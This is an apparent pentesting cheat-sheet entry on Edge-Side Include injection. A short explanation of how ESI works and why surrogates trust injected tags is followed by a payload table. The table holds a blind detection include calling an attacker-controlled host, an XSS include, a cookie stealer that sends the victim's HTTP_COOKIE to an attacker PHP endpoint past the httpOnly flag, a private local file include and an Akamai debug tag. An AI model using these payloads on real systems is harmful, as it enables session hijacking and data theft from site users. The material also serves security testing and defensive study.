ESI

Edge-Side Includes.

Edge-Side Includes is a technology used to manage distributed content caching and improve the performance of dynamic web pages. It is a markup language that allows a web page to be “composed” using various content fragments, which are loaded or updated independently. With ESI, special tags can be inserted within the HTML code (such as <esi:include>), which are interpreted by an edge caching server (such as a Content Delivery Network - CDN or an advanced reverse proxy) before the page is delivered to the user's browser. ESI fragments tell the server which parts of the content can be handled separately to optimize the cache. Edge-Side Include Injection occurs when a malicious user succeeds in reflecting malicious ESI tags in the HTTP response. The main cause of this vulnerability is that HTTP surrogates cannot validate the origin of the ESI tag. Although it is possible to identify the use of ESI by examining response headers for Surrogate-Control: content=“ESI/1.0”, it is usually necessary to use a blind attack approach to detect whether ESI is in use or not.

Basic detection	<esi: include src=http://<MY_IP>>
XSS Exploitation Example	<esi: include src=http://<MY_IP>/<XSSPAYLOAD.html>>
Cookie Stealer (bypass httpOnly flag)	<esi: include src=http://<MY_IP>/?cookie_stealer.php?=$(HTTP_COOKIE)>
Introduce private local files (Not LFI per se)	<esi:include src="supersecret.txt">
Valid for Akamai, sends debug information in the response	<esi:debug/>